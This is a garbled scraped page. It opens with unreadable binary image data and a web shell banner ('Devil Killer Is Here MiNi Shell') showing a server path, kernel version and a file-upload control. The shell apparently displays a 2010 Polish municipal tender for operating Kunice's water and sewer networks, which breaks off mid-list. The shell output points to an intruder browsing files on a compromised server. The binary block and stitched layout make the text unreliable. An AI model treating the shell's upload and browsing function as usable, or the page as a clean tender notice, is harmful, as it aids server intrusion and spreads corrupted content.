JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100520/138158-N-2010.html

<p class="kh_header"><b>Kunice: Eksploatacja sieci wodociągowej i kanalizacyjnej na terenie Gminy Kunice</b><br>
<b>Numer ogłoszenia: 138158 - 2010; data zamieszczenia: 20.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Kunice , ul. Gwarna 1, 59-216 Kunice, woj. dolnośląskie, tel. 076 8575322, faks 076 8575482.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kunice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Eksploatacja sieci wodociągowej i kanalizacyjnej na terenie Gminy Kunice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II. PRZEDMIOT I CHARAKTERYSTYKA ZAMÓWIENIA   
1. Prowadzenie w imieniu Zamawiającego eksploatacji sieci wodociągowej na terenie Gminy Kunice, a w szczególności: 
1) Dbanie o całodobową i bezawaryjną dostawę wody dla odbiorców indywidualnych i zbiorowych,
2) Usuwanie wszelkich przecieków i nieszczelności na sieciach wodociągowych      i  przyłączach,
3)  Niezwłoczne usuwanie wszelkich awarii (awaria powinna być zabezpieczona w ciągu 2 godz. od zgłoszenia i usunięta w ciągu 24 godz. od zgłoszenia) i usterek technicznych powstałych na sieciach zakłócających ciągłość dostaw wody i prawidłową eksploatację sieci, 
4) Prowadzenie dokumentacji eksploatowanej sieci,
5) Zawieranie umów w imieniu Zamawiającego na dostawę wody z odbiorcami indywidualnymi i zbiorowymi,
6) Pobierania należności od odbiorców za dostarczoną wodę po cenach określonych  uchwałą Rady Gminy,
7) Ponoszenia wszelkich kosztów związanych z eksploatacją sieci wodociągowej a w szczególności:
 a) Opłaty za badania wody  
 b) Opłaty za legalizację wodomierzy w przypadku podejrzenia złych wskazań lub    upływu terminu ważności, 
  8) Określanie warunków technicznych i udzielanie w porozumieniu z Zamawiającym  zgody na podłączenie do sieci wodociągowych 
 9) Egzekucja należności od odbiorców nie regulujących opłat za korzystanie z sieci 
Do obowiązków Wykonawcy należy zapewnienie zdolności urządzeń wodociągowych do realizacji dostaw wody w wymaganej ilości i pod odpowiednim ciśnieniem oraz dostaw wody w sposób ciągły i niezawodny, a także zapewnienie należytej jakości dostarczanej wody zgodnej z obowiązującymi normami, w tym w szczególności:
W zakresie eksploatacji sieci wodociągowej  
- zawieranie umów na dostawę wody z wszystkimi jej odbiorcami 
- odczytywanie stanów wodomierzy
- fakturowanie i rozliczanie opłat za pobraną wodę w tym dostarczenie odbiorcom faktur 
- windykacja należności 
- odcinanie przyłączy za nieterminowe płacenie należności 
- przyjmowanie i załatwianie wszelkich reklamacji związanych z dostawą wody
- prowadzenie ewidencji użytkowanych wodomierzy
- przyjmowanie zgłoszeń dotyczących wymiany zamontowania  nowych wodomierzy 
- kontrolowanie stanów technicznych oraz podejść wodomierzowych
- prowadzenie ewidencji odbiorców indywidualnych i grupowych
- prowadzenie ewidencji ilościowo-wartościowej sprzedaży 
- reagowanie na nielegalny pobór wody i prowadzenie wspólnych działań z gminą w celu ich eliminowania 
- przyjmowanie do eksploatacji nowo wybudowanych sieci i przechowywanie  dokumentacji projektowo wykonawczej sieci wodociągowej oraz obiektów technicznych na niej zabudowanych
- wydawanie warunków technicznych podłączenia do sieci wodociągowej dla jednostek  
  gospodarczych prowadzących działalność projektową oraz dla osób prawnych
- nadzór techniczny nad realizacją wydanych warunków technicznych 
- opiniowanie i uzgadnianie opracowań projektowych
- dokonywanie uzgodnień technicznych z właścicielami innych urządzeń i sieci
- nadzór techniczny nad eksploatacją sieci wodociągowej 
- udział w odbiorach robót zanikowych, końcowych i gwarancyjnych 
- wykonywanie analiz fizyko- chemicznych i bakteriologicznych wg potrzeb
- kontrola prawidłowości wykonywania połączenia przyłączy domowych z instalacją  
  wewnętrzną (wyeliminowanie połączeń sieci z lokalnymi ujęciami wody) 
- prowadzenie całodobowego pogotowia wodociągowego
- przeglądy sieci i uzbrojenia hydrantów w obecności przedstawiciela użytkownika i  Straży Pożarnej 
 
 W zakresie remontów kapitalnych na sieci wodociągowej
-  wykonywanie remontów kapitalnych w zakresie funkcjonowania wodociągów zgodnie z przedstawionym i zatwierdzonym  planem, o którym mowa w załączniku nr 3 do niniejszej  SIWZ - Wzór umowy.

    Przedmiot zamówienia posiada kod CPV- 65100000-4

2. Prowadzenie w imieniu Zamawiającego eksploatacji sieci kanalizacyjnej na terenie Gminy Kunice, a w szczególności:
1) Całodobowy i bezawaryjny odbiór ścieków od odbiorców indywidualnych i  
    zbiorowych,
2) Bieżąca konserwacja i naprawy urządzeń, usuwanie awarii (awaria powinna być  
    zabezpieczona w ciągu 2 godz. od zgłoszenia i usunięta w ciągu 24 godz. od  
    zgłoszenia) i usterek oraz dbałość o stan techniczny wszystkich elementów sieci,
3) Zakup i wymiana z własnych środków zużytych elementów sieci i urządzeń na  
    przepompowniach ścieków oprócz środków trwałych (szaf sterowniczych i pomp),
4) Pobieranie należności od dostawców ścieków, zgodnie z opracowanymi taryfami  na podstawie Rozporządzenia Ministra Infrastruktury,
5) Przesyłanie ścieków do oczyszczalni w Legnicy 
6) Ponoszenie wszelkich opłat wynikających z eksploatacji sieci kanalizacyjnej       
    oraz prowadzenie niezbędnej dokumentacji dotyczącej eksploatacji i utrzymania sieci kanalizacyjnych.

W szczególności Wykonawca w czasie trwania umowy zobowiązany będzie do:
1) Zawierania umów w imieniu Zamawiającego z użytkownikami sieci kanalizacyjnych,
2) Prowadzenia kontroli podmiotów gospodarczych i gospodarstw domowych  
    korzystających z usług w zakresie parametrów odprowadzanych ścieków określonych odrębnymi przepisami,
3) Określania parametrów technicznych potencjalnych użytkowników sieci  
    kanalizacyjnej, udzielania w porozumieniu z Zamawiającym pozwoleń na    
    podłączenia do sieci,
4) Prowadzenie bieżącego nadzoru nad realizacją inwestycji w zakresie odprowadzania ścieków na terenie Gminy Kunice,
5) Prowadzenie dokumentacji elementów (urządzeń i obiektów) sieci,
6) Do kontroli podmiotów gospodarczych oraz gospodarstw domowych w zakresie  
    gospodarki ściekowej,
7) Egzekucji należności od odbiorców nie regulujących opłat za korzystanie z sieci.

Do obowiązków Wykonawcy należy zapewnienie zdolności urządzeń kanalizacyjnych do realizacji odprowadzania ścieków w sposób ciągły i niezawodny, a także zapewnienie należytej jakości odprowadzanych ścieków zgodnej z obowiązującymi normami, w tym w szczególności:
W zakresie eksploatacji  sieci kanalizacyjnej 
- zawieranie umów na zrzut ścieków z wszystkimi jej wytwórcami 
- fakturowanie i rozliczanie opłat za zrzucone ścieki w tym dostarczenie faktur odbiorcom 
- windykacja należności 
- odcinanie przyłączy za nieterminowe płacenie należności 
- przyjmowanie  i załatwianie wszelkich reklamacji związanych z odbiorem ścieków 
- reagowanie na nielegalny zrzut ścieków i prowadzenie wspólnych działań z gminą  w celu jego eliminowania
- prowadzenie ewidencji ilościowo- wartościowej sprzedaży
- przyjmowanie do eksploatacji nowo wybudowanych sieci i przechowywanie dokumentacji projektowo powykonawczej sieci kanalizacyjnej oraz obiektów technicznych na niej zabudowanych
- prowadzenie i aktualizowanie inwentaryzacji technicznej sieci kanalizacyjnej
- wydawanie warunków technicznych podłączenie się do sieci kanalizacyjnej dla jednostek gospodarczych prowadzących działalność gospodarczą oraz dla osób prawnych 
- nadzór techniczny nad realizacją wydanych warunków technicznych
- opiniowanie i uzgadnianie opracowań projektowych
- dokonywanie uzgodnień technicznych z właścicielami innych urządzeń i sieci
- udział w odbiorach robót zanikowych, końcowych i gwarancyjnych
- wykonywanie analiz fizyko - chemicznych i bakteriologicznych
- kontrola prawidłowości wykonywania połączenia przyłączy domowych z siecią  
  kanalizacyjną 
- prowadzenie całodobowego pogotowia kanalizacyjnego 
- dokonywanie przeglądów technicznych pracy każdej pompowni  ścieków polegającej na: 
a) sprawdzaniu prac pływaków 
b) sprawdzanie pracy pomp
c) sprawdzaniu sterowania i sygnalizacji 
d) sprawdzaniu zapiaszczenia i poziomu osadu
- konserwowanie urządzeń i instalacji elektrycznej, pomiary
- wymiana uszkodzonych włazów 
- usuwanie zatorów na sieci kanalizacyjnej 
- czyszczenie pompowni i studni zbiorczych wg potrzeb 

W zakresie remontów kapitalnych na sieci kanalizacyjnej
-  wykonywanie remontów kapitalnych w zakresie funkcjonowania kanalizacji wraz   
   z przepompowniami ścieków zgodnie z przedstawionym i zatwierdzonym  planem,  
   o którym mowa w załączniku nr 3 do niniejszej  SIWZ - Wzór umowy.
    
Przedmiot zamówienia posiada kod  CPV- 90480000-5

3. Charakterystyka infrastruktury objętej przedmiotem zamówienia 
3.1.Dane ogólne:
Wodociąg: 
Kunice, Ziemnice, Grzybiany

Kanalizacja: 
	Kunice, Szczytniki Małe, Spalona, Golanka Górna,
	Ziemnice, Grzybiany, Rosochata, Jaśkowice, Piotrówek,
             Pątnów, Bieniowice, Miłogostowice, Szczytniki nad Kaczawą

3.2 Charakterystyka sieci 

Miejscowości na terenie Gminy Kunice są zwodociągowane i skanalizowane. 
Sieci wodno - kanalizacyjne na terenie Gminy Kunice wybudowane zostały w latach 
1991 - 2001r., a w Piotrówku w 2005r. 
Przedmiotem jest eksploatacja sieci we wsiach, które korzystają poprzez m. Legnica z ujęcia Wielka woda oraz z  komunalnej oczyszczalni ścieków  w Legnicy.
	
UWAGA:
Gmina Kunice kupuje hurtowo wodę od Legnickiego Przedsiębiorstwa Wodociągów i Kanalizacji S.A. na dzień ogłoszenia przetargu za cenę netto  3,10 zł/m3 oraz odprowadza hurtowo ścieki za cenę netto 3,25 zł/m3 - do oczyszczalni w Legnicy.
	
	
UWAGA:
Na trenie Gminy Kunice obowiązują przez okres 1 roku tj. od dnia 05 września 2009 roku zatwierdzone taryfy Uchwałą Rady Gminy z dnia 29 lipca 2009 roku Nr XXX/184/09 - zgodnie z ustawą o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków.

Eksploatacja sieci wodociągowej prowadzona będzie we wsiach Kunice, Ziemnice, Grzybiany, które zaopatrywane są  w wodę z miasta Legnica z ujęcia miejskiego w ilości (93.081m3 - Kunice) (46.395m3 - Ziemnice i Grzybiany) łącznie: 139.446m3 rocznie. 
Kanalizacja sanitarna z miejscowości  Kunice, Szczytniki Małe, Spalona, Golanka Górna w ilości 94.391m3; Ziemnice, Grzybiany, Rosochata, Jaśkowice, Piotrówek w ilości 89.358m3; Pątnów, Bieniowice, Miłogostowice, Szczytniki nad Kaczawą w ilości 47.275m3 odprowadzane są do komunalnej oczyszczalni ścieków miasta Legnica w ilości łącznej 230.024m3 rocznie.

3.3.  Wyposażenie sieci wodno-kanalizacyjnej:

Sieć wodociągowa w Kunicach zakończona wodomierzem, wpięta w Legnicy 
przy ul. Wrocławskiej, sieć Ziemnice - Grzybiany zakończona wodomierzem, wpięta
w Legnicy w ulicę Iwaszkiewicza. Nieruchomości wyposażone są w wodomierze do odczytu poboru wody.
Sieć kanalizacyjna opomiarowana w trzech punktach - zamontowane przepływomierze ścieków dla poszczególnych (ciągów sieci kanalizacyjnych) miejscowości:
- Golanka Górna - Spalona - Szczytniki Małe - Kunice (przepływomierz);
- Piotrówek - Rosochata - Jaśkowice - Grzybiany - Ziemnice (przepływomierz);
- Szczytniki nad Kaczawą - Miłogostowice - Bieniowice - Pątnów (przepływomierz); 
wyposażona w system grawitacyjno - ciśnieniowy z przepompowniami sieciowymi:
	
Kunice, 3 pompownie główne / PG /, 11 lokalnych punktów tłocznych / LPT /
Grzybiany, 1PG, 1 LPT
Ziemnice, 4 PG / we wsi, POM /
Jaśkowice, 1 PG , 23 LPT
Rosochata, 1 PG
Szczytniki nad Kaczawą, 1 PG, 16 LPT
Bieniowice, 1 PG, 14 LPT
Pątnów, 1 PG, 9 LPT
Miłogostowice, 1 PG, 5 LPT
Spalona-Golanka 1 PG, 14 LPT
Szczytniki Małe 6 LPT
Piotrówek 2 PG,  2 LPT.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 65.10.00.00-4, 90.48.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium: 
1) Zamawiający wymaga złożenia wadium  w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych) 
2) Wadium należy wnieść przed upływem terminu składania ofert, określonego  w dziale X pkt. 1 niniejszej Specyfikacji
3) Wadium  może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c) gwarancjach bankowych
d) gwarancjach ubezpieczeniowych
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 p.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju przedsiębiorczości  ( Dz. U. z 2007 r. Nr 42 poz.275 z późniejszymi zmianami )
4) Wadium wnoszone w pieniądzu należy wpłacić przelewem  na rachunek bankowy zamawiającego BS Legnica oKunice nr   43 8649 1028 2001 0000 0228 0005 . 
5) Wadium złożone w formie pieniądza musi znaleźć się na rachunku zamawiającego najpóźniej w terminie złożenia ofert.
6) Wadium wnoszone w formie innej niż pieniądz należy złożyć  równocześnie z ofertą, ale w oddzielnej, opisanej kopercie. 
Opis winien zawierać:

Nazwa  Wykonawcy :
Wadium -   przetarg nr GP.I. 341-1/2010
Termin  złożenia  28. 05. 2010 r.   godz. 10.00

6) Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania  niezbędnej  wiedzy i doświadczenie , polegających na tym , że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
a. Przez okres nie krótszy niż dwa lata prowadzili eksploatację sieć wodociągowej   o długości nie mniej niż 30 km, u co najmniej jednego zamawiającego; 
b. Przez okres nie krótszy niż dwa lata prowadzili eksploatację sieć kanalizacji sanitarnej:
-  o długości nie mniej niż 60 km,
-  ilości przepompowni ścieków i lokalnych punktów tłocznych - co najmniej 80 szt. łącznie, 
u co najmniej jednego zamawiającego.
Zamawiający dokona oceny spełniania warunków udziału w niniejszym postępowaniu na podstawie  oświadczeń lub dokumentów złożonych przez Wykonawcę  w Ofercie i wymaganych załącznikach do Oferty wg kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania potencjałem technicznym w postaci co najmniej :
- samochód techniczny VUKO,
- samochód asenizacyjny, 
- pogotowie techniczne 2 szt., 
- koparko - ładowarka, 
- mini koparka, 
- wywrotka o ładowności min 6 ton
- urządzenie do wykrywania nieszczelności kanalizacyjnych.
Zamawiający dokona oceny spełniania warunków udziału w niniejszym postępowaniu na podstawie  oświadczeń lub dokumentów złożonych przez Wykonawcę  w Ofercie i wymaganych załącznikach do Oferty wg kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych - oraz co najmniej 3 letnie doświadczenie w  prowadzeniu eksploatacji sieci wod.-kan.,
Zamawiający dokona oceny spełniania warunków udziału w niniejszym postępowaniu na podstawie  oświadczeń lub dokumentów złożonych przez Wykonawcę  w Ofercie i wymaganych załącznikach do Oferty wg kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej ; za spełnienie tych warunków uważa się :
a) posiadanie środków finansowych lub zdolności kredytowej o łącznej kwocie co   
    najmniej 700 000,00 zł.
b) posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej  
    działalności na kwotę nie mniejszą niż 1 000 000,00 zł.
Zamawiający dokona oceny spełniania warunków udziału w niniejszym postępowaniu na podstawie  oświadczeń lub dokumentów złożonych przez Wykonawcę  w Ofercie i wymaganych załącznikach do Oferty wg kryterium spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
